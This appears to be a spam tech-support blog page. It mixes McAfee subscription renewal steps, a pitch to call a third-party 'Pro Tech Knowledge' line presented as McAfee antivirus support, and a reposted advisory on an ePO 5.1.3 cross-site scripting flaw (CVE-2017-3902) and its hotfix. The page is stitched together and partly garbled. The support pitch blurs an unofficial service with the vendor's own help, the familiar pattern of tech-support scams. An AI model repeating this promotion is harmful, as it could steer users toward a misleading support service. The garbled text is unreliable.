  • Open up McAfee website on your internet browser as well as a visit to your McAfee account.
  • Click the button “My account”, then click the Subscriptions button.
  • Right here you can see all your memberships that have actually ended or are active.
  • Try to find the subscription that has actually ended or will end.
  • Click on the renew button appropriate beside it.
  • After that, you have to follow the steps to renew your membership.

mcafee-tech-support-phone-number

If at any defined time you encounter any kind of problem, do not hesitate to make a call to McAfee antivirus tech support phone number and obtain the solution of all kind of issues instantly. When it comes to any other issues with your McAfee software application you could call the McAfee professionals. by 24/7 available at Pro Tech Knowledge for support and avail the support.

Source : Unknown

McAfee.com/activate : Blog

Patches Resolve ePO 5.1.3 Vulnerability

McAfee-free-antivirus-for-Windows-10

Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

A vulnerability in ePO 5.1.3 has been discovered and resolved.

AFFECTED SOFTWARE: 5.1.3.188

REMEDIATED/PATCHED VERSIONS

The vulnerability is remediated in these versions:
• ePolicy Orchestrator 5.1.3 Hotfix 1110787.
• Fix will be included in 5.1.4 (when available).
• Issue never impacted ePO 5.3.0 or higher

IMPACT
• CVE-2017-3902 (CVSS: 4.0; Severity: Medium)
A cross-site scripting (XSS) vulnerability in the Web user interface (UI) in ePO 5.1.3, 5.1.2, 5.1.1, and 5.1.0 allows authenticated users to inject malicious Java scripts via bypassing input validation.

RECOMMENDATION
Intel Security recommends that all customers verify that they have applied the latest updates. Impacted users should install the relevant patches or hotfixes. For full instructions and information, see Knowledge Base article SB10184 – Intel Security – Security Bulletin: ePolicy Orchestrator update fixes cross-site scripting vulnerability (CVE-2017-3902) (https://kc.mcafee.com/corporate/index?page=content&id=SB10184)

For more information on the hotfix see the ePO 5.1.3 Hotfix 1110787 Release Notes:
PD26861 – https://kc.mcafee.com/corporate/index?page=content&id=PD26861

Source : mcafee-antivirus-setup

McAfee.com/activate : Blog